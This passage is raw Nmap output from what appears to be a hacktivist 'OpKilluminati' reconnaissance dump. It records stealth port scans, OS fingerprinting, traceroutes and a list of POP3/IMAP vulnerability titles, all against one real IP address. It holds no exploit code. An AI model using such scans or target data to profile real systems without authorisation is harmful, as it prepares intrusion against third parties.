17467| [23281] Dovecot imap/pop3-login dovecot-auth DoS
17468| [23280] Dovecot Malformed APPEND Command DoS
17469| [14459] mmmail mmpop3d USER Command mmsyslog Function Format String
17470| [12033] Slackware Linux imapd/ipop3d Malformed USER/PASS Sequence DoS
17471| [5857] Linux pop3d Arbitrary Mail File Access
17472| [2471] akpop3d username SQL Injection
17473|_
17474Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
17475Device type: general purpose
17476Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
17477OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:2.6
17478Aggressive OS guesses: Linux 3.10 - 3.12 (91%), Linux 4.4 (91%), Linux 4.9 (89%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.10 - 3.16 (86%), Linux 4.0 (86%), Linux 3.10 - 4.11 (85%), Linux 3.11 - 4.1 (85%), Linux 3.2 - 4.9 (85%)
17479No exact OS matches for host (test conditions non-ideal).
17480Network Distance: 17 hops
17481
17482TRACEROUTE (using port 443/tcp)
17483HOP RTT ADDRESS
174841 129.73 ms 10.245.200.1
174852 ...
174863 130.37 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
174874 130.36 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
174885 135.74 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
174896 154.41 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
174907 166.02 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
174918 163.64 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
174929 163.66 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
1749310 163.65 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
1749411 254.88 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
1749512 256.27 ms 204.70.192.125
1749613 250.75 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
1749714 255.18 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
1749815 251.92 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
1749916 253.37 ms 64.89.38.2
1750017 249.96 ms 192.252.144.58
17501#######################################################################################################################################
17502Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:21 EST
17503NSE: Loaded 163 scripts for scanning.
17504NSE: Script Pre-scanning.
17505Initiating NSE at 08:21
17506Completed NSE at 08:21, 0.00s elapsed
17507Initiating NSE at 08:21
17508Completed NSE at 08:21, 0.00s elapsed
17509Initiating Parallel DNS resolution of 1 host. at 08:21
17510Completed Parallel DNS resolution of 1 host. at 08:21, 0.02s elapsed
17511Initiating SYN Stealth Scan at 08:21
17512Scanning 192.252.144.58 [1 port]
17513Completed SYN Stealth Scan at 08:21, 2.04s elapsed (1 total ports)
17514Initiating Service scan at 08:21
17515Initiating OS detection (try #1) against 192.252.144.58
17516Retrying OS detection (try #2) against 192.252.144.58
17517Initiating Traceroute at 08:21
17518Completed Traceroute at 08:21, 3.02s elapsed
17519Initiating Parallel DNS resolution of 16 hosts. at 08:21
17520Completed Parallel DNS resolution of 16 hosts. at 08:21, 0.41s elapsed
17521NSE: Script scanning 192.252.144.58.
17522Initiating NSE at 08:21
17523Completed NSE at 08:21, 0.01s elapsed
17524Initiating NSE at 08:21
17525Completed NSE at 08:21, 0.00s elapsed
17526Nmap scan report for 192.252.144.58
17527Host is up (0.26s latency).
17528
17529PORT STATE SERVICE VERSION
17530443/tcp filtered https
17531Too many fingerprints match this host to give specific OS details
17532Network Distance: 17 hops
17533
17534TRACEROUTE (using proto 1/icmp)
17535HOP RTT ADDRESS
175361 135.05 ms 10.245.200.1
175372 ...
175383 135.85 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
175394 135.69 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
175405 141.24 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
175416 163.31 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
175427 172.15 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
175438 167.73 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
175449 172.12 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
1754510 163.58 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
1754611 261.42 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
1754712 260.32 ms 204.70.192.125
1754813 254.33 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
1754914 255.77 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
1755015 252.74 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
1755116 256.65 ms 64.89.38.2
1755217 260.62 ms 192.252.144.58
17553
17554NSE: Script Post-scanning.
17555Initiating NSE at 08:21
17556Completed NSE at 08:21, 0.00s elapsed
17557Initiating NSE at 08:21
17558Completed NSE at 08:21, 0.00s elapsed
17559#######################################################################################################################################
17560Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:24 EST
17561Nmap scan report for 192.252.144.58
17562Host is up (0.26s latency).
17563
17564PORT STATE SERVICE VERSION
175653306/tcp filtered mysql
17566Too many fingerprints match this host to give specific OS details
17567Network Distance: 17 hops
17568
17569TRACEROUTE (using proto 1/icmp)
17570HOP RTT ADDRESS
175711 139.36 ms 10.245.200.1
175722 ...
175733 141.64 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
175744 141.64 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
175755 143.96 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
175766 166.17 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
175777 167.16 ms be2797.ccr41.fra03.atlas.cogentco.com (154.54.58.225)
175788 163.79 ms be3186.agr41.fra03.atlas.cogentco.com (130.117.0.2)
175799 166.79 ms centurylink.fra03.atlas.cogentco.com (130.117.14.26)
1758010 163.43 ms 63-235-41-102.dia.static.qwest.net (63.235.41.102)
1758111 256.33 ms cr1-te-0-5-1-0.ft3.savvis.net (204.70.224.158)
1758212 257.23 ms 204.70.192.125
1758313 251.42 ms cr2-xe-4-0-2.jfk2.savvis.net (206.28.101.9)
1758414 256.51 ms msr1-te-0-3-0-0.bos.savvis.net (206.28.97.205)
1758515 252.76 ms hr3-xe-8-0.0.bo3.savvis.net (206.28.97.198)
1758616 254.34 ms 64.89.38.2
1758717 258.13 ms 192.252.144.58
17588#######################################################################################################################################
17589Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:25 EST
17590NSE: Loaded 47 scripts for scanning.
17591NSE: Script Pre-scanning.
17592Initiating NSE at 08:25
17593Completed NSE at 08:25, 0.00s elapsed
17594Initiating NSE at 08:25
17595Completed NSE at 08:25, 0.00s elapsed
17596Initiating Parallel DNS resolution of 1 host. at 08:25
17597Completed Parallel DNS resolution of 1 host. at 08:25, 0.03s elapsed
17598Initiating SYN Stealth Scan at 08:25
17599Scanning 192.252.144.58 [65535 ports]
17600SYN Stealth Scan Timing: About 8.04% done; ETC: 08:32 (0:05:55 remaining)
17601SYN Stealth Scan Timing: About 27.15% done; ETC: 08:29 (0:02:44 remaining)
17602SYN Stealth Scan Timing: About 41.37% done; ETC: 08:29 (0:02:09 remaining)
17603SYN Stealth Scan Timing: About 58.19% done; ETC: 08:29 (0:01:27 remaining)
17604SYN Stealth Scan Timing: About 76.86% done; ETC: 08:28 (0:00:45 remaining)
17605Completed SYN Stealth Scan at 08:28, 187.43s elapsed (65535 total ports)
17606Initiating Service scan at 08:28
17607Initiating OS detection (try #1) against 192.252.144.58
17608Retrying OS detection (try #2) against 192.252.144.58
17609Initiating Traceroute at 08:28
17610Completed Traceroute at 08:28, 0.14s elapsed
17611Initiating Parallel DNS resolution of 2 hosts. at 08:28
17612Completed Parallel DNS resolution of 2 hosts. at 08:28, 0.02s elapsed
17613NSE: Script scanning 192.252.144.58.
17614Initiating NSE at 08:28
17615Completed NSE at 08:28, 0.00s elapsed
17616Initiating NSE at 08:28
17617Completed NSE at 08:28, 0.00s elapsed
17618Nmap scan report for 192.252.144.58
17619Host is up (0.13s latency).
17620Not shown: 65532 filtered ports
17621PORT STATE SERVICE VERSION
1762225/tcp closed smtp
17623139/tcp closed netbios-ssn
17624445/tcp closed microsoft-ds
17625Too many fingerprints match this host to give specific OS details
17626Network Distance: 2 hops
17627
17628TRACEROUTE (using port 25/tcp)
17629HOP RTT ADDRESS
176301 134.74 ms 10.245.200.1
176312 134.73 ms 192.252.144.58
17632
17633NSE: Script Post-scanning.
17634Initiating NSE at 08:28
17635Completed NSE at 08:28, 0.00s elapsed
17636Initiating NSE at 08:28
17637Completed NSE at 08:28, 0.00s elapsed
17638######################################################################################################################################
17639Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-25 08:28 EST
17640NSE: Loaded 47 scripts for scanning.
17641NSE: Script Pre-scanning.
17642Initiating NSE at 08:28
17643Completed NSE at 08:28, 0.00s elapsed
17644Initiating NSE at 08:28
17645Completed NSE at 08:28, 0.00s elapsed
17646Initiating Parallel DNS resolution of 1 host. at 08:28
17647Completed Parallel DNS resolution of 1 host. at 08:28, 0.02s elapsed
17648Initiating UDP Scan at 08:28
17649Scanning 192.252.144.58 [15 ports]
17650Completed UDP Scan at 08:28, 2.30s elapsed (15 total ports)
17651Initiating Service scan at 08:28
17652Scanning 12 services on 192.252.144.58
17653Service scan Timing: About 8.33% done; ETC: 08:48 (0:17:58 remaining)
17654Completed Service scan at 08:30, 102.59s elapsed (12 services on 1 host)
17655Initiating OS detection (try #1) against 192.252.144.58
17656Retrying OS detection (try #2) against 192.252.144.58
17657Initiating Traceroute at 08:30
17658Completed Traceroute at 08:30, 7.16s elapsed
17659Initiating Parallel DNS resolution of 1 host. at 08:30
17660Completed Parallel DNS resolution of 1 host. at 08:30, 0.00s elapsed
17661NSE: Script scanning 192.252.144.58.
17662Initiating NSE at 08:30
17663Completed NSE at 08:30, 7.14s elapsed
17664Initiating NSE at 08:30
17665Completed NSE at 08:30, 1.18s elapsed
17666Nmap scan report for 192.252.144.58
17667Host is up (0.21s latency).
17668
17669PORT STATE SERVICE VERSION
1767053/udp open|filtered domain
1767167/udp open|filtered dhcps
1767268/udp open|filtered dhcpc
1767369/udp open|filtered tftp
1767488/udp open|filtered kerberos-sec
17675123/udp open|filtered ntp
17676137/udp filtered netbios-ns
17677138/udp filtered netbios-dgm
17678139/udp open|filtered netbios-ssn
17679161/udp open|filtered snmp
17680162/udp open|filtered snmptrap
17681389/udp open|filtered ldap
17682500/udp open|filtered isakmp
17683|_ike-version: ERROR: Script execution failed (use -d to debug)
17684520/udp open|filtered route
176852049/udp closed nfs
17686Too many fingerprints match this host to give specific OS details
17687Network Distance: 17 hops
17688
17689TRACEROUTE (using port 137/udp)
17690HOP RTT ADDRESS
176911 ... 7
176928 129.94 ms 10.245.200.1
176939 ... 10
1769411 130.78 ms 10.245.200.1
1769512 134.78 ms 10.245.200.1
1769613 134.78 ms 10.245.200.1
1769714 134.78 ms 10.245.200.1
1769815 134.76 ms 10.245.200.1
1769916 129.23 ms 10.245.200.1
1770017 129.25 ms 10.245.200.1
1770118 ...
1770219 129.65 ms 10.245.200.1
1770320 129.51 ms 10.245.200.1
1770421 ... 28
1770529 129.75 ms 10.245.200.1
1770630 131.41 ms 10.245.200.1
17707
17708NSE: Script Post-scanning.
17709Initiating NSE at 08:30
17710Completed NSE at 08:30, 0.00s elapsed
17711Initiating NSE at 08:30
17712Completed NSE at 08:30, 0.00s elapsed
17713#######################################################################################################################################
17714 Anonymous #OpKilluminati JTSEC Full Recon #22